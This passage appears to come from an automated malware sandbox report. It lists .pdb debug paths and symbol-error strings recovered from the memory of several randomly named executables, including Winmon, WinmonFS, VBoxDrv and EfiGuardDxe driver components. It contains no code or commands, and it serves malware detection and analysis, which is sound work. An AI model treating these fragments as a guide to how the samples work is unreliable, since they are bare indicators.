                  Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Unable to locate the .pdb file in this location source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The module signature does not match with .pdb signature. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: .pdb.dbg source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: '(EfiGuardDxe.pdbx source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: or you do not have access permission to the .pdb location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dbghelp.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: dbghelp.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
